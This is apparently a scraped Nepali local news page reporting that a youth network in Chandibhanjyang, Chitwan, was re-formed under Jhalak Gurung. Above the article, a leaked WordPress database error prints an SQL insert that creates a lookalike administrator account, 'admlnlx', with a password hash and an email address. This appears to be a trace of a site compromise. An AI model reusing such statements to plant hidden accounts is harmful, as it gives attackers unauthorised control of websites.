WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B0mIL/mp1zvl2DfIWvhavyTFitUgkg0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-09 21:09:49', '', 'admlnlx', 'admlnlx')
चितवन, माघ २२–
चितवनको पहाडी गाविस चण्डिभञ्ज्याङमा यूवा सञ्जालको पुनःगठन गरिएको छ । आज चण्भिञ्ज्याङ–६ कालिखोलामा भएको यूवाहरुको भेलाले झलक गुरुङको अध्यक्षतामा ११ सदस्यीय युवा सञ्जाल पुनःगठन गरिएको हो ।
भेलाले उपाध्यक्षमा याम गुरुङ, सचिवमा देवकुमार गुरुङ, सहसचिवमा पूर्ण गुरुङ र कोषाध्यक्षमा गौमती गुरुङलाई चयन गरिएको छ । अन्य सदस्यहरुमा सुकबहादुर गुरुङ, सविना गुरुङ, निर्मल गुरुङ, राजकुमार चेपाङ, सनम पन्त रहेका छन् । चण्डिभञ्ज्याङ गाविसका सहसचिव लक्ष्मण चेपाङको प्रमुख अतिथ्य तथा निवर्तमान उपाध्यक्ष यानबहादुर गुरुङको अध्यक्षतामा भेला समपन्न भएको हो ।